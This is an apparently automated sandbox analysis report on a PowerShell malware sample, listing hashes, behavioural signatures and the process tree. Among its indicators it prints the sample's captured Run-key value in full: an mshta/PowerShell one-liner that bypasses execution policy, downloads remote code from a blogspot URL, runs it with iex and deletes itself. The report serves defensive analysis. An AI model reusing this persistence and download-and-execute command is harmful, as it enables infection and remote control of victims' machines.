Analysis
-
max time kernel
65s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
12-01-2025 14:26
Static task
static1
Behavioral task
behavioral1
Sample
chutmarao.ps1
Resource
win7-20240903-en
windows7-x64
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
chutmarao.ps1
Resource
win10v2004-20241007-en
windows10-2004-x64
14 signatures
150 seconds
General
-
Target
chutmarao.ps1
-
Size
2.5MB
-
MD5
7c2e9489af70d3967960dbe1cb87f4ae
-
SHA1
bcade1f31f869e58848c09cd022652b612580daf
-
SHA256
19bad3275a0cd1caa9a8eb75d496eaa897ca4c7a07aeab78ab3309d91b4f64fd
-
SHA512
9d910243fa5847046dd6793465d5b84c2e1f72d7d42acd5e52860f9bd3545b25e981322a312930a192dd43bafe3c5679657699a78bc98f48b4b6a2aec447a374
-
SSDEEP
1536:7Ic2Lo8L+bTXe26vgn00oR/S7rV521Gd9AcaMorjFN4UAjtbTliBdIpjXClBEv7l:ZD1
Score
7/10
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 2536 powershell.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Defenderlt-98 = "mshta \"javascript:bu=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hoot11nov.blogspot.com////loka.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(bu[2])[bu[0]](bu[1], 0, true);close();fe=new ActiveXObject('Scripting.FileSystemObject');fe.DeleteFile(WScript.ScriptFullName);\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Defenderl-80 = "schtasks /run /tn Defenderl-80" powershell.exe -
pid Process 2536 powershell.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2536 powershell.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\chutmarao.ps11⤵
- Deletes itself
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2536